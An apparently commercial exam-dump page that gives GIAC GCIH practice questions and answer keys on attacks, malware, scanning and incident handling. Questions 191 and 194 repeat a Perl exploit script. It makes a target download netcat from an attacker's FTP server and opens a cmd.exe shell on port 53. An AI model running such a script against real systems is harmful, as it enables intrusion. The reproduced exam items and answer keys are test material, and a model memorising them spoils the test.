100% Pass Guaranteed Free GCIH Exam Dumps Sep 16, 2022 [Q177-Q201]

Share

100% Pass Guaranteed Free GCIH Exam Dumps Sep 16, 2022

Verified & Latest GCIH Dump Q&As with Correct Answers


How to study the GCIH Exam

There are two main types of resources for preparation of GCIH certification exams first there are the study guides and books that are detailed and suitable for building knowledge from ground up then there are video tutorials and lectures that can somehow ease the pain of through study and are comparatively less boring for some candidates yet these demand time and concentration from the learner. Smart Candidates who want to build a solid foundation in all exam topics and related technologies usually combine video lectures with study guides to reap the benefits of both but there is one crucial preparation tool as often overlooked by most candidates the practice exams. Practice exams are built to make students comfortable with the real exam environment. Statistics have shown that most students fail not due to that preparation but due to exam anxiety the fear of the unknown. Exam4PDF expert team recommends you to prepare some notes on these topics along with it don't forget to practice GCIH exam dumps which had been written by our expert team, Both these will help you a lot to clear this exam with good marks.


GCIH Structure

The test GCIH is the only benchmark necessary for obtaining the GIAC Certified Incident Handler designation. Also, it’s a proctored exam and candidates should pay a registration fee of $1,999 to be eligible for it. To add more, the exam includes 100 to 150 inquiries with different levels of complexity and structure. The candidates should know that they will have only 4 hours to reply to as many questions as possible and get a passing score of 70%.

 

NEW QUESTION 177
Which of the following attacks allows an attacker to sniff data frames on a local area network (LAN) or stop the traffic
altogether?

  • A. Man-in-the-middle
  • B. ARP spoofing
  • C. Session hijacking
  • D. Port scanning

Answer: B

 

NEW QUESTION 178
Your friend plans to install a Trojan on your computer. He knows that if he gives you a new version of chess.exe, you will definitely install the game on your computer. He picks up a Trojan and joins it to chess.exe. The size of chess.exe was 526,895 bytes originally, and after joining this chess file to the Trojan, the file size increased to 651,823 bytes. When he gives you this new game, you install the infected chess.exe file on your computer. He now performs various malicious tasks on your computer remotely. But you suspect that someone has installed a Trojan on your computer and begin to investigate it. When you enter the netstat command in the command prompt, you get the following results:
C:\WINDOWS>netstat -an | find "UDP" UDP IP_Address:31337 *:*
Now you check the following registry address:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices In the above address, you notice a 'default' key in the 'Name' field having " .exe" value in the corresponding 'Data' field. Which of the following Trojans do you think your friend may have installed on your computer on the basis of the above evidence?

  • A. Tini
  • B. Donald Dick
  • C. Qaz
  • D. Back Orifice

Answer: D

 

NEW QUESTION 179
Adam works as an Incident Handler for Umbrella Inc. He is informed by the senior authorities that the server of the marketing department has been affected by a malicious hacking attack. Supervisors are also claiming that some sensitive data are also stolen.
Adam immediately arrived to the server room of the marketing department and identified the event as an incident. He isolated the infected network from the remaining part of the network and started preparing to image the entire system. He captures volatile data, such as running process, ram, and network connections.
Which of the following steps of the incident handling process is being performed by Adam?

  • A. Eradication
  • B. Containment
  • C. Identification
  • D. Recovery

Answer: B

Explanation:
Section: Volume C

 

NEW QUESTION 180
Victor works as a professional Ethical Hacker for SecureEnet Inc. He wants to scan the wireless network of the
company. He uses a tool that is a free open-source utility for network exploration. The tool uses raw IP packets to
determine the following:
What ports are open on our network systems.
What hosts are available on the network.
Identify unauthorized wireless access points.
What services (application name and version) those hosts are offering.
What operating systems (and OS versions) they are running.
What type of packet filters/firewalls are in use.
Which of the following tools is Victor using?

  • A. Nmap
  • B. Sniffer
  • C. Kismet
  • D. Nessus

Answer: A

 

NEW QUESTION 181
You have configured a virtualized Internet browser on your Windows XP professional computer. Using the virtualized Internet browser, you can protect your operating system from which of the following?

  • A. Malware installation from unknown Web sites
  • B. Mail bombing
  • C. Distributed denial of service (DDOS) attack
  • D. Brute force attack

Answer: A

Explanation:
Section: Volume A

 

NEW QUESTION 182
Which of the following techniques can be used to map 'open' or 'pass through' ports on a gateway?

  • A. Tracefire
  • B. Tracegate
  • C. Traceport
  • D. Traceroute

Answer: D

 

NEW QUESTION 183
Which of the following statements about Denial-of-Service (DoS) attack are true?
Each correct answer represents a complete solution. Choose three.

  • A. It saturates network resources.
  • B. It disrupts services to a specific computer.
  • C. It changes the configuration of the TCP/IP protocol.
  • D. It disrupts connections between two computers, preventing communications between services.

Answer: A,B,D

 

NEW QUESTION 184
You discover that your network routers are being flooded with broadcast packets that have the return address of one
of the servers on your network. This is resulting in an overwhelming amount of traffic going back to that server and
flooding it. What is this called?

  • A. Blue jacking
  • B. Syn flood
  • C. IP spoofing
  • D. Smurf attack

Answer: D

 

NEW QUESTION 185
In which of the following attacks does an attacker spoof the source address in IP packets that are sent to the victim?

  • A. Dos
  • B. DDoS
  • C. SQL injection
  • D. Backscatter

Answer: D

 

NEW QUESTION 186
Alice wants to prove her identity to Bob. Bob requests her password as proof of identity, which Alice dutifully provides (possibly after some transformation like a hash function); meanwhile, Eve is eavesdropping the conversation and keeps the password. After the interchange is over, Eve connects to Bob posing as Alice; when asked for a proof of identity, Eve sends Alice's password read from the last session, which Bob accepts. Which of the following attacks is being used by Eve?

  • A. Replay
  • B. Cross site scripting
  • C. Session fixation
  • D. Firewalking

Answer: A

 

NEW QUESTION 187
Which of the following attacks can be overcome by applying cryptography?

  • A. Buffer overflow
  • B. DoS
  • C. Web ripping
  • D. Sniffing

Answer: D

 

NEW QUESTION 188
Jane works as a Consumer Support Technician for ABC Inc. The company provides troubleshooting support to users.
Jane is troubleshooting the computer of a user who has installed software that automatically gains full permissions on
his computer. Jane has never seen this software before. Which of the following types of malware is the user facing on
his computer?

  • A. Adware
  • B. Rootkits
  • C. Viruses
  • D. Spyware

Answer: B

 

NEW QUESTION 189
Which of the following penetration testing phases involves reconnaissance or data gathering?

  • A. Post-attack phase
  • B. Attack phase
  • C. Out-attack phase
  • D. Pre-attack phase

Answer: D

Explanation:
Section: Volume B

 

NEW QUESTION 190
Adam works as a Security Administrator for Umbrella Inc. A project has been assigned to him to secure access to the network of the company from all possible entry points. He segmented the network into several subnets and installed firewalls all over the network. He has placed very stringent rules on all the firewalls, blocking everything in and out except the ports that must be used. He does need to have port 80 open since his company hosts a website that must be accessed from the Internet. Adam is still worried about the programs like Hping2 that can get into a network through covert channels.
Which of the following is the most effective way to protect the network of the company from an attacker using Hping2 to scan his internal network?

  • A. Block ICMP type 3 messages
  • B. Block all outgoing traffic on port 21
  • C. Block ICMP type 13 messages
  • D. Block all outgoing traffic on port 53

Answer: C

Explanation:
Section: Volume A

 

NEW QUESTION 191
Adam, a malicious hacker performs an exploit, which is given below:
##################################################### $port = 53; # Spawn cmd.exe on port X $your = "192.168.1.1";# Your FTP Server 89 $user = "Anonymous";# login as $pass = '[email protected]';# password ##################################################### $host = $ARGV[0];
print "Starting ...\n";
print "Server will download the file nc.exe from $your FTP server.\n"; system("perl msadc.pl -h $host -C \"echo
open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\""); system("perl msadc.pl -h
$host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo bin>>sasfile\""); system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host -C \"echo get hacked. html>>sasfile\""); system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print "Server is downloading ...
\n";
system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when download is finished ...
(Have a ftp server)\n";
$o=; print "Opening ...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n"; #system("telnet $host $port"); exit(0);
Which of the following is the expected result of the above exploit?

  • A. Opens up a SMTP server that requires no username or password
  • B. Opens up a telnet listener that requires no username or password
  • C. Creates a share called "sasfile" on the target system
  • D. Creates an FTP server with write permissions enabled

Answer: B

 

NEW QUESTION 192
Which of the following are the primary goals of the incident handling team?
Each correct answer represents a complete solution. Choose all that apply.

  • A. Prevent any further damage.
  • B. Freeze the scene.
  • C. Inform higher authorities.
  • D. Repair any damage caused by an incident.

Answer: A,B,D

 

NEW QUESTION 193
Which of the following systems is used in the United States to coordinate emergency preparedness and incident management among various federal, state, and local agencies?

  • A. National Disaster Management System (NDMS)
  • B. National Emergency Management System (NEMS)
  • C. US Incident Management System (USIMS)
  • D. National Incident Management System (NIMS)

Answer: D

 

NEW QUESTION 194
Adam, a malicious hacker performs an exploit, which is given below:
#####################################################
$port = 53;
# Spawn cmd.exe on port X
$your = "192.168.1.1";# Your FTP Server 89
$user = "Anonymous";# login as
$pass = '[email protected]';# password
#####################################################
$host = $ARGV[0];
print "Starting ...\n";
print "Server will download the file nc.exe from $your FTP server.\n"; system("perl msadc.pl -h
$host -C \"echo
open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\""); system("perl msadc.pl -h
$host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo bin>>sasfile\""); system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host - C \"echo get hacked. html>>sasfile\""); system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print "Server is downloading ...
\n";
system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when download is finished ...
(Have a ftp server)\n";
$o=; print "Opening ...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n"; #system("telnet
$host $port"); exit(0);
Which of the following is the expected result of the above exploit?

  • A. Opens up a SMTP server that requires no username or password
  • B. Opens up a telnet listener that requires no username or password
  • C. Creates a share called "sasfile" on the target system
  • D. Creates an FTP server with write permissions enabled

Answer: B

 

NEW QUESTION 195
Which of the following programs can be used to detect stealth port scans performed by a malicious hacker?
Each correct answer represents a complete solution. Choose all that apply.

  • A. nmap
  • B. portsentry
  • C. libnids
  • D. scanlogd

Answer: B,C,D

Explanation:
Section: Volume B

 

NEW QUESTION 196
Which of the following statements about threats are true?
Each correct answer represents a complete solution. Choose all that apply.

  • A. A threat is any circumstance or event with the potential of causing harm to a system in the form of destruction, disclosure, modification of data, or denial of service.
  • B. A threat is a sequence of circumstances and events that allows a human or other agent to cause an information-related misfortune by exploiting vulnerability in an IT product.
  • C. A threat is a weakness or lack of safeguard that can be exploited by vulnerability, thus causing harm to the information systems or networks.
  • D. A threat is a potential for violation of security which exists when there is a circumstance, capability, action, or event that could breach security and cause harm.

Answer: A,B,D

 

NEW QUESTION 197
Which of the following types of attacks slows down or stops a server by overloading it with requests?

  • A. Impersonation attack
  • B. Vulnerability attack
  • C. Network attack
  • D. DoS attack

Answer: D

Explanation:
Section: Volume C

 

NEW QUESTION 198
In which of the following scanning methods do Windows operating systems send only RST packets irrespective of whether the port is open or closed?

  • A. XMAS
  • B. TCP FIN
  • C. TCP SYN
  • D. FTP bounce

Answer: B

Explanation:
Section: Volume A

 

NEW QUESTION 199
John works as a Network Administrator for Net Perfect Inc. The company has a Windows-based network. The
company uses Check Point SmartDefense to provide security to the network of the company. On the HTTP servers of
the company, John defines a rule for dropping any kind of userdefined URLs. Which of the following types of attacks
can be prevented by dropping the user-defined URLs?

  • A. Hybrid attacks
  • B. PTC worms and mutations
  • C. Morris worm
  • D. Code red worm

Answer: B

 

NEW QUESTION 200
Which of the following virus is a script that attaches itself to a file or template?

  • A. E-mail virus
  • B. Macro virus
  • C. Boot sector
  • D. Trojan horse

Answer: B

 

NEW QUESTION 201
......

Latest GCIH dumps - Instant Download PDF: https://practicetorrent.exam4pdf.com/GCIH-dumps-torrent.html